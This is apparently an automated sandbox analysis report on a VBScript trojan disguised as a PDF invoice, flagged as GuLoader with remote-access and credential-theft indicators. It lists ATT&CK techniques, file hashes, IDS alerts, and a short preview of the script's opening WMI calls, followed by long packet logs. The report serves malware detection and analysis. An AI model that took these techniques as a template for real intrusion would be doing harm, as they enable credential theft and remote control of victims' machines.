Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-D3MSVR
Source: Yara match | File source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 321 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 321 Scripting | 311 Process Injection | 11 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 23 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

[Behavior graph (image not reproduced): Behavior Graph ID: 1636426, Sample: FAKTURA-P-4526485-274274772..., Startdate: 12/03/2025, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs | 27% | Virustotal | | Browse
FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs | 26% | ReversingLabs | Script-WScript.Trojan.GuLoader |

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://drive.google.co | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 84.201.210.39 | true | false | | high
drive.google.com | 216.58.206.46 | true | false | | high
drive.usercontent.google.com | 172.217.18.1 | true | false | | high
Host_6637.6637.6637.657e | unknown | unknown | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
216.58.206.46 | drive.google.com | United States | | 15169 | GOOGLEUS | false
172.217.18.1 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false

IP
127.0.0.1

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1636426
Start date and time: 2025-03-12 19:13:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs
renamed because original name is a hash value
Original Sample Name: FAKTURA-P-4526485-2742747722-00043067pdf.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@13/11@3/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 71
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 84.201.210.39, 23.199.214.10, 4.175.87.197
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1232 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6648 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        Time | Type | Description
                                                                                        14:15:03 | API Interceptor | 163x Sleep call for process: powershell.exe modified
                                                                                        14:15:09 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7067150137517356
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq2:2JIB/wUKUKQncEmYRTwh0i
                                                                                        MD5:18D9A39793DF078D4C36296099127BA3
                                                                                        SHA1:6E86FE1A27D1739BEE141A30D6F07C84B5ABBD3E
                                                                                        SHA-256:CB73A29A81E94AA00226A53858A7A3B4E3EB8297E08C4B81953B3BC4E413D711
                                                                                        SHA-512:E8567E9EF88F7FEDFD7E719968BDB2770BF422C6AAE83E3F73D62369149A59A197BD02D3635B2AF5F4AEA4401AFCFE03A13E7ABB0CDC0DBB2568AEDD4CD08CF7
                                                                                        Malicious:false
                                                                                        Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x524fff13, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7899824381943227
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:zSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:zazaPvgurTd42UgSii
                                                                                        MD5:91E63E7442816DACAE147E6F6DF77180
                                                                                        SHA1:E6E4F02BBBCCD4FBE89E67E56206E6564606B8E6
                                                                                        SHA-256:44AF748FCF5BD941554AABFE5600BC9BF434D2BF1FFFA5E15F3CF20832912D2C
                                                                                        SHA-512:A784C912FE0CF70B2238465DE6433D06BA203009A7D1C153FDB17588BCE5C554C792FF9FED02CA6387B2C008E993B05327DC37F507C2A09F91CB3E9A0B930262
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.08234094854861387
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:CZW8YebMpmYVgGqt/57Dek3JGsc4lallEqW3l/TjzzQ/t:CZW8zbcKHR3tGsc4Amd8/
                                                                                        MD5:AC50DB5BED1392498ECCD8405511072F
                                                                                        SHA1:7DCEC1A74ABAE313F226E29A736054407D600F15
                                                                                        SHA-256:55E6B65E9BCABAF4A2F76FDEE50EA5B7FA1792B51CB973B6A0AA078B49C35A84
                                                                                        SHA-512:6A4A0F9419632C6B54CD6E9AE3105ECDA5C77887DDD459B6FB4DBA9DFD9CEE77B6FB0F2978300C549940D57D2244991225F917241A2B672F8E40E29F2517ED07
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):11608
                                                                                        Entropy (8bit):4.8908305915084105
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1940658735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllulbnolz:NllUc
                                                                                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):501772
                                                                                        Entropy (8bit):5.885641682263199
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:dRL+/YiJ8G7PvYLrLc3oIGp0RUQ4niHpG/7x0wqQebSbj8KFenBHk5Dojote67:dRL+/CY3YLrLCo5anJGl0wC+bj8Kvn
                                                                                        MD5:17F8E06BBDA025B74265AF3BFD1C4467
                                                                                        SHA1:64BB7A3E9A0BFE8AE892B01906EA78125A5B215B
                                                                                        SHA-256:02A29850E9C8DE8D57A795B34077CA4740B54055138D3F5F04271B701FD378DC
                                                                                        SHA-512:F4FA68C129B928F5805740401CC5BF2E38B562C0227E298730423BA9BA04ACE2777FB482D73867D77C57C530CA1D33B1B555E04D36CA5377A820C2D6002593AC
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                        File type:ASCII text, with CRLF line terminators
                                                                                        Entropy (8bit):5.383639834106727
                                                                                        TrID:
                                                                                        • Visual Basic Script (13500/0) 100.00%
                                                                                        File name:FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs
                                                                                        File size:28'010 bytes
                                                                                        MD5:bcc3425d021c26a5baf855502b0c609b
                                                                                        SHA1:0b01002803b807210127366afe4c9abff1fd62da
                                                                                        SHA256:6a2f42008025068bd6943e90e73f473de802e86f6fc5b33cc5958a5e28f9ec56
                                                                                        SHA512:847cbf999308e55c410684a8ef137d589d85958b80fad0fcbb6d740723648bcac2d8ad13d8378722617ade8ffecea6d329e561d5b878ebdc37eaa016f6e05b0c
                                                                                        SSDEEP:384:9fAXfS9owA4GLSjKnpnW+aRFJdN/N0boDw2bfALlZjpJ9:9fAoypnc3/KZ2boLlZjL9
                                                                                        TLSH:3CC217D0C8811B9DEFD31ABA3C0D20249AF124B5D6F66C7237BCA42C3724A466D6D5F9
                                                                                        File Content Preview:......Set Sondylomorum = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")....Set Blserorkestrets = Sondylomorum.ExecQuery("Select * from Win32_Process Where Name = 'explorer.e" + "xe'")....For Each Trodsigt in Blserorkestrets....Set E
                                                                                        Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-12T19:15:16.096593+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49690 | 216.58.206.46 | 443 | TCP
2025-03-12T19:16:37.070849+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49696 | 216.58.206.46 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Mar 12, 2025 19:15:21.772762060 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.772770882 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.773662090 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.773726940 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.773734093 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.775660038 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.775783062 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.775790930 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.776550055 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.776601076 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.776608944 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.778069019 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.778134108 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.778142929 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.779885054 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.779942989 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.779952049 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.783602953 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.783665895 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.783678055 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.788492918 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.788527012 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.788554907 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.788567066 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.788625002 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.792289972 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.796869993 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.796904087 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.796921968 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.796935081 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.797018051 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.801285982 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.805620909 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.805654049 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.805706024 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.805716038 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.805773020 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.810075998 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.814492941 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.814564943 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.814577103 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.820173979 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.820208073 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.820261002 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.820269108 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.820334911 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.824574947 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.828998089 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.829034090 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.829054117 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.829063892 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.829202890 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.829209089 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.833010912 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.833115101 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.833123922 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.849683046 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.849785089 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.849796057 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.896960020 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.952344894 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.958638906 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.958678961 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.958702087 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.958714962 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.958724976 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.958776951 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.959693909 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.959747076 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.959754944 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.961117029 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.961184978 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.961193085 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.961702108 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.961891890 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.961899996 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.963221073 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.963287115 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.963294029 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.964653015 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.964709997 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.964718103 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.966145992 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.966238022 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.966245890 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.967926025 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.967994928 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.968003035 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.969352007 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.969389915 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.969415903 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.969424963 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.969476938 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.970721006 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.972322941 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.972388029 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.972402096 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.972410917 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.972465992 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.977423906 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.977529049 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.977562904 CET44349693172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:21.977596998 CET49693443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:15:21.977607965 CET44349693172.217.18.1192.168.2.7
